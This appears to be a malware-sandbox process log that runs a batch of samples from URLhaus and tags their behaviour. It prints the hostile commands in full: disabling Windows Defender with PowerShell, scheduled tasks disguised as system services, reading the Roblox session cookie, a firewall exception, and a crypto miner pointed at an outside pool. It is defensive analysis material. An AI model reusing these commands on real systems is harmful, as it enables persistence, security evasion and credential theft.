    PID:2020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2368 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3978ab6b-c6c2-4baa-a7c1-abdcbf6292ff} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" socket
    3⤵
    PID:5020
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2944 -childID 1 -isForBrowser -prefsHandle 3044 -prefMapHandle 3124 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee2043e7-a110-4f03-9da6-c33cb0ffd852} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:1308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3108 -childID 2 -isForBrowser -prefsHandle 3716 -prefMapHandle 2652 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6debb04c-647f-44fe-9124-e0d937b97dec} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:4120
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4432 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4404 -prefMapHandle 4400 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19c2c1b7-a0c4-4a70-b28e-2ca2d3ff63c9} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" utility
    3⤵
    - Checks processor information in registry
    PID:1660
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4804 -childID 3 -isForBrowser -prefsHandle 3684 -prefMapHandle 3680 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f69346e5-8144-49e3-b80f-a8d6aeb7cdff} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:4316
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5808 -childID 4 -isForBrowser -prefsHandle 5752 -prefMapHandle 5748 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ade41af5-2453-4579-9fdb-461b16c5676a} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:2012
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5964 -childID 5 -isForBrowser -prefsHandle 5972 -prefMapHandle 5980 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d70ebe35-166c-4318-831f-f27fad9d1c03} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:3656
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5804 -childID 6 -isForBrowser -prefsHandle 5988 -prefMapHandle 5992 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2908a68d-6d37-46d6-a37b-a4ba049612a8} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:4448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1452 -childID 7 -isForBrowser -prefsHandle 2588 -prefMapHandle 4232 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {84c7254b-495d-45fc-b335-9dbd78cdd51b} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:5012
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5920 -childID 8 -isForBrowser -prefsHandle 5932 -prefMapHandle 6228 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7d99bd9-a6d9-4caa-b9fb-5d8a12786f3e} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:4904
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6272 -childID 9 -isForBrowser -prefsHandle 6048 -prefMapHandle 5928 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1128 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c73e5262-75b5-4f10-99d1-7e39c02023fa} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
    3⤵
    PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\UrlHausFiles\help.scr"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5072

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:556
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO0D3FD782\.text
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1404

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:444

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:5116

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2680

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:2036

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:3156

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2552

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:5044

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2796

C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr
"C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr" /S
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4800

C:\Users\Admin\Downloads\UrlHausFiles\help.scr
"C:\Users\Admin\Downloads\UrlHausFiles\help.scr" /S
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\Downloads\UrlHausFiles\help.scr /F
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4256
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\Downloads\UrlHausFiles\help.scr /F
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im 2HIf.exe&&exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im 2HIf.exe
    3⤵
    - Kills process with taskkill
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1912
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im 2HIf.exe&&exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im 2HIf.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:4824
- C:\ProgramData\2HIf.exe
  C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4952
- C:\ProgramData\SMB.exe
  C:\ProgramData\SMB.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im 2HIf.exe&&exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im 2HIf.exe
    3⤵
    - Kills process with taskkill
    PID:5184
- C:\ProgramData\2HIf.exe
  C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5196
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im 2HIf.exe&&exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im 2HIf.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    PID:5400
- C:\ProgramData\2HIf.exe
  C:\ProgramData\2HIf.exe -o stratum+tcp://auto.c3pool.org:19999 -u L -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5324
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:5428
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7436
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - System Location Discovery: System Language Discovery
    - Gathers network information
    PID:7488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im 2HIf.exe&&exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im 2HIf.exe
    3⤵
    - Kills process with taskkill
    PID:7576

C:\Users\Admin\Downloads\UrlHausFiles\help.scr
"C:\Users\Admin\Downloads\UrlHausFiles\help.scr" /S
1⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2168

C:\Users\Admin\Downloads\UrlHausFiles\start.exe
"C:\Users\Admin\Downloads\UrlHausFiles\start.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3516
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3228
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5D7F.tmp.bat""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1920
- - C:\Windows\SysWOW64\timeout.exe
    timeout 3
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:1052
- - C:\Users\Admin\AppData\Roaming\System32.exe
    "C:\Users\Admin\AppData\Roaming\System32.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4736

C:\Users\Admin\Downloads\UrlHausFiles\aa.exe
"C:\Users\Admin\Downloads\UrlHausFiles\aa.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Users\Admin\Downloads\UrlHausFiles\ataturk.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ataturk.exe"
1⤵
- Executes dropped EXE
PID:4284

C:\Users\Admin\Downloads\UrlHausFiles\nobody.exe
"C:\Users\Admin\Downloads\UrlHausFiles\nobody.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4720

C:\Users\Admin\Downloads\UrlHausFiles\nobody.exe
"C:\Users\Admin\Downloads\UrlHausFiles\nobody.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2944

C:\Users\Admin\Downloads\UrlHausFiles\handeltest.exe
"C:\Users\Admin\Downloads\UrlHausFiles\handeltest.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3056

C:\Users\Admin\Downloads\UrlHausFiles\Tutorial.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Tutorial.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2820
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5004

C:\Users\Admin\Downloads\UrlHausFiles\xs.exe
"C:\Users\Admin\Downloads\UrlHausFiles\xs.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2812
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"' & exit
  2⤵
  PID:3068
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6E38.tmp.bat""
  2⤵
  PID:852
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2220
- - C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe
    "C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"
    3⤵
    - Executes dropped EXE
    PID:452

C:\Users\Admin\Downloads\UrlHausFiles\Loader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Loader.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2636
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender.exe"' & exit
  2⤵
  PID:4692
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "Windows Defender" /tr '"C:\Users\Admin\AppData\Roaming\Windows Defender.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp725E.tmp.bat""
  2⤵
  PID:4656
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:4952
- - C:\Users\Admin\AppData\Roaming\Windows Defender.exe
    "C:\Users\Admin\AppData\Roaming\Windows Defender.exe"
    3⤵
    - Executes dropped EXE
    PID:4388

C:\Users\Admin\Downloads\UrlHausFiles\aidans.dont.run.exe
"C:\Users\Admin\Downloads\UrlHausFiles\aidans.dont.run.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"' & exit
  2⤵
  PID:1300
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp79B1.tmp.bat""
  2⤵
  PID:3156
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1448
- - C:\Users\Admin\AppData\Roaming\windows.exe
    "C:\Users\Admin\AppData\Roaming\windows.exe"
    3⤵
    - Executes dropped EXE
    PID:3228

C:\Users\Admin\Downloads\UrlHausFiles\saloader.exe
"C:\Users\Admin\Downloads\UrlHausFiles\saloader.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1832
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\UrlHausFiles\saloader.exe"
  2⤵
  - Views/modifies file attributes
  PID:1052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\saloader.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1860
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4304
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:2396
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4048
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4952
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\UrlHausFiles\saloader.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4152
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4072

C:\Users\Admin\Downloads\UrlHausFiles\output.exe
"C:\Users\Admin\Downloads\UrlHausFiles\output.exe"
1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:436

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4344
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4592
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3332

C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
"C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:1376
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0POzvRyV7d3y.bat" "
  2⤵
  PID:4516
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2472
- - C:\Windows\system32\PING.EXE
    ping -n 10 localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:488
- - C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:2456
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YiPHZcEq2X9N.bat" "
      4⤵
      PID:3792
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1720
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2908
    - - C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3468
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4308
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bfH6WtiGWqS0.bat" "
        6⤵
        
        PID:2676
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2548
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3508
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4596
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MDs8eJLYi2ZV.bat" "
        8⤵
        
        PID:3616
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:2156
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4364
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2100
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CVDg47JPWaOB.bat" "
        10⤵
        
        PID:3496
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:1156
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2156
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5280
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IwIV5ajlKu7d.bat" "
        12⤵
        
        PID:5404
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        13⤵
        
        PID:5448
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5464
        
        C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe
        
        "C:\Users\Admin\Downloads\UrlHausFiles\seksiak.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3044
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BQH3x0DLLHob.bat" "
        14⤵
        
        PID:5264
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        15⤵
        
        PID:5360
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        15⤵
